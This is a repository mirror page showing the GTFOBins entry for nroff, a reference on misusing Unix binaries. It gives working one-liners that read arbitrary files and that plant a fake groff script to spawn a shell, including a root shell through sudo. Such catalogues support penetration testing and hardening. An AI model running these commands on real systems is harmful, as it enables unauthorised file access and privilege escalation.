This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-20 18:45:22 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
3dc961c0c9945f11c098eaa0ae377c505cddb9fd
GTFOBins.github.io
/
_gtfobins
/
nroff.md
Andrea Cardaci
7cfac08921
Improve the description of nroff
2020-12-20 20:54:05 +01:00
535 B
Raw
Blame
History
functions
functions
file-read
shell
sudo
description
code
The file is typeset and some warning messages may appear.
LFILE=file_to_read nroff $LFILE
code
TF=$(mktemp -d) echo '#!/bin/sh' > $TF/groff echo '/bin/sh' >> $TF/groff chmod +x $TF/groff GROFF_BIN_PATH=$TF nroff
code
TF=$(mktemp -d) echo '#!/bin/sh' > $TF/groff echo '/bin/sh' >> $TF/groff chmod +x $TF/groff sudo GROFF_BIN_PATH=$TF nroff
Reference in New Issue
View Git Blame
Copy Permalink